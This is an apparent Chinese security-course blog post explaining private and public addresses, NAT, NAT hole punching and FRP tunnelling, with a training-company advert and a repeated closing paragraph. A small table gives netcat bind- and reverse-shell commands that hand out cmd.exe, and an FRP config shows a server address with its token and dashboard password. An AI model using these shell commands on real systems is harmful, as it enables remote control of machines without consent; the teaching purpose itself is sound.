内网穿透&端口映射&内外网反弹 shell 回顾

内网穿透&端口映射&内外网反弹 shell 回顾


内网概念

  • 我们常说的内网,一般指的是非公有 IPv4 地址的网络
  • 比如学校机房里的电脑一般为私有网络,家里的网络也是私有网络

私有网络的范围与划分

ipaddressarea
A 类地址10.0.0.0~10.255.255.255
B 类地址172.16.0.0 ~172.31.255.255
C 类地址192.168.0.0~192.168.255.255

image-20220620191736728

培训、环境、资料、考证
公众号:Geek极安云科
网络安全群:624032112
网络系统管理群:223627079 
网络建设与运维群:870959784 
移动应用开发群:548238632
短视频制作群:744125867
大数据应用开发群:962141356 
物联网应用与服务群:967579409
物联网应用开发群:884879404

极安云科校企合作经理VX liuliu5488233

极安云科专注于技能提升,赋能
2024年广东省高校的技能提升,受赋能的客户院校均获奖!
2024年江苏省赛一二等奖前13名中,我们赋能客户占五支队伍!
2024年湖南省赛赋能三所院校均获奖!
2024年山东省赛赋能两所院校均获奖!
2024年湖北省赛赋能参赛院校九支队伍,共计斩获一等奖2项、三等奖7项!

外网概念

  • 外网一般持有全球唯一的 IPv4 地址
  • 比如我的腾讯云服务器:114.132.218.55

为什么要讲内外网?

  • 内网 IP 可达外网 IP,与之交互
  • 外网 IP 则无法直接找到内网 IP

Netcat 实验

  • 内网连接内网(正、反)
  • 内网连接外网(反)
  • 外网连接内网(正)
  • 外网连接外网(正、反)
被攻击 PCOur PCexplanation
nc -e cmd.exe -lvnp 1234nc 10.10.10.1 1234正向 shell
nc -e cmd.exe 10.10.10.4 1234nc -lvnp 1234反向 shell

NAT 概念

网络地址转换(Network Address Translation,NAT)

NAT 是一种将私有(保留)地址转化为合法 IP 地址的转换技术

  • 它被广泛应用于各种类型 Internet 接入方式和各种类型的网络中
  • NAT 可以完成重用地址,并且对于内部的网络结构可以实现对外隐蔽。
  • NAT 设备自动屏蔽了非内网主机主动发起的连接

为什么要使用 NAT

	IPv4 网络地址紧缺,从而出现了私有网段,来补充地址,但私有网段不可访问 internet 所以出现了 NAT 地址转换,将私有地址,转换为公网 IP 从而访问 internet
	NAT 的作用也就在于:将私有IP地址,转化为公网的合法 IP

NAT 实验解析

端口映射

该理论已被收录至空间安全理论

内网穿透

内网穿透,也叫 NAT 穿透

进行内网穿透的目的:使用内网穿透是为了使具有某一个特定源 IP 地址源端口号的数据包,不被 NAT 设备屏蔽而正确路由到内网主机

应用在身边的内网穿透技术

  • 电脑两节点音频接收、转发

为什么要使用内网穿透

  • NAT 设备自动屏蔽了非内网主机主动发起的连接。从外网发往内网的数据包将被 NAT设备丢弃
  • 位于不同 NAT 设备之后的主机之间无法直接交换信息
  • 外部主机要与内网主机相互通信,必须由内网主机主动发起连接
  • 虽然保护了内网主机免于来自外部网络的攻击,另一方面也为 P2P 通信带来了一定困难

穿透模拟-通信双方一台 PC 位于 NAT 之后

环境:

PC A:拥有内网 IP,能够出网(NAT 转换)
PC B:拥有公网 IP,能够直接出网

如下图一般:

image-20220701130854572

  • PC A 位于 NAT 之后,并有用 IP 地址和对应端口 192.168.1.100:1234
  • PC B 位于 NAT 之前,并拥有 IP 地址和对应端口 218.5.18.2:1234
  • PC A 出网借助 NAT 转换,公网地址为 114.5.2.3

  • 由于 PC B 有一个公网 IP,所以 PC A 可以直接通过 TCP 协议连接到它的 IP 地址 ``
  • 然而如果 PC B 向 PC A 主动发起连接,则不会成功

此时就需要一个公有的服务器辅助进行内网穿透

  1. PC A 和 PC B 向服务器发起登录请求,并保持一个 TCP 或 UDP 连接
  2. 服务器记录他俩的 IP 地址和端口号

这里服务器对 PC A 是记录经过 NAT 转换之后的 IP 和端口号

  1. 当 PC B 想连接 PC A 时,首先向服务器提出请求,服务器在收到请求后向 PC A 发出打洞命令,并讲 PC B 的 IP 地址和端口号发送给 PC A
  2. PC A 根据收到 IP 地址和端口号向 PC B 发起 TCP 或 UDP 连接
  3. 最终 PC A 和 PC B 之间便可建立数据传输通道

穿透模拟-通信双方 PC 都位于 NAT 之后

环境:

两台主机都处于内网中,拥有出网条件(NAT 转换)

如下图一般:

image-20220701133313030

  • PCA 位于 NAT 之后,并有用 IP 地址和对应端口 192.168.1.100:1234
  • PCB 位于 NAT 之后,并拥有 IP 地址和对应端口 172.24.1.100:6000
  • PCA 出网借助 NATA 转换,公网地址为 218.5.18.2:51200
  • PCA 出网借助 NATB 转换,公网地址为 114.5.2.3:5000

服务器记录的 IP:端口 是 PCA 和 PCB 经过 NAT 转换之后的 IP:端口

此时,PCA 和 PCB 之间任意一方的连接请求都会被对方的 NAT 设备屏蔽

  1. PC A 首先向服务器提出连接请求,服务器将 PCA 的 NAT 218.5.18.2:51200 发送给 PCB,并向 PCB 发出打洞命令
  2. PCB 收到服务器的打洞命令后,首先向 PCA 的 NAT 地址 218.5.18.2:51200 发送一定数目的 UDP 探测包或 TCP 连接请求,然后在 NATB 上打一个方向为 218.5.18.2:51200 的洞
  3. PCB 向服务器报告打洞完成
  4. 服务器收到 PCB 的报告后,将 PCB 的公网 IP 地址和端口号 114.32.4.251:5000 发送给 PCA
  5. 此时 NATB 以及留下对应于 NATA 的 218.5.18.2:51200 洞,PCA 向 114.32.4.251:5000 将不会被丢弃 (这与端口映射的原理很相似)

内网穿透原理总结

  • NAT设备(或软件)维护一个状态表,用来把内部网络的私有 IP 地址映射到外部网络的合法 IP 地址上去

  • 每个包头中的 IP 地址和端口信息在 NAT 设备(或软件)中都被修改并翻译成一正确的 IP 地址发往下一级

  • 当一个内网主机通过 NAT 打开一个“外出”的 TCP 或 UDP 会话时,NAPT 分配给这个会话一个公网 IP 和端口,用来接收外网的响应的数据包,并经过转换通知内部网的主机

  • 这样,NAPT在 [私有IP:私有端口][公网IP:公网端口] 之间建立了一个端口绑定。

应用 FRP 内网穿透技术-使 PC 达到公网可寻

FRP Server 端配置

[common]
bind_port = 7000
dashboard_port = 7500
token = qwese.
dashboard_user = admin
dashboard_pwd = qwese.
vhost_http_port = 10080
vhost_https_port = 10443
tls_enable = true

FRP Client 端配置

client 端也就是我们要端口映射的对象,这里映射为 HTTP 协议

[common]
server_addr =114.132.218.55
server_port = 7000
token = qwese.

[perse.windowsPC-http2]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 9002

image-20220701160420035

应用 FRP 点对点内网穿透技术-PC 达到公网可寻

http://blog.demon.ren/685.htm

后言

我自己想了一下,我没敢去看,上次那课实在是讲太烂了

我也是第一次讲课,很多地方没有讲好,这是没法避免的,所以我也尽力在让自己讲好,在改变

所有学习的过程都是这样,不一定是在安全技术上

不能说,学安全就高人一等,学艺术,学文学,学数学,学哲学就高人一等

而是我们能否在学习的过程中,保持一个学徒的心

都说人看的多了,学的多了,就知道自己的渺小了,因为眼界和想法跟以前不一样

虽然我们的课听的人少,但是我也希望能把技术和思路都尽数教给大家,虽然我们的技术不在一个层面,哈哈这是时间的问题,我相信大家总有一天说不定也能超过我

再说说为什么我们叫深蓝网络安全啊,先前我和你们坤哥创建了这么一个安全团队,但实际上就咋一个老 B 登在负责安全方面的一些技术,咋们之前本来想叫个 Perse 安全,意为恒心,希望在学习安全技术上,能够保持初心,啊不要去碰黑产对吧,同样也不要去做一些破坏他人安全和隐私的事,我们学这些说大了是为了国家网络空间安全,说小了哎,就是我想学,想装逼,想赚钱

但是我也希望能把技术和思路都尽数教给大家,虽然我们的技术不在一个层面,哈哈这是时间的问题,我相信大家总有一天说不定也能超过我

再说说为什么我们叫深蓝网络安全啊,先前我和你们坤哥创建了这么一个安全团队,但实际上就咋一个老 B 登在负责安全方面的一些技术,咋们之前本来想叫个 Perse 安全,意为恒心,希望在学习安全技术上,能够保持初心,啊不要去碰黑产对吧,同样也不要去做一些破坏他人安全和隐私的事,我们学这些说大了是为了国家网络空间安全,说小了哎,就是我想学,想装逼,想赚钱

所以我希望大家,能够多多评论和思考以及多问一些问题,并去实践我们每节课的演练过程

  • 25
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值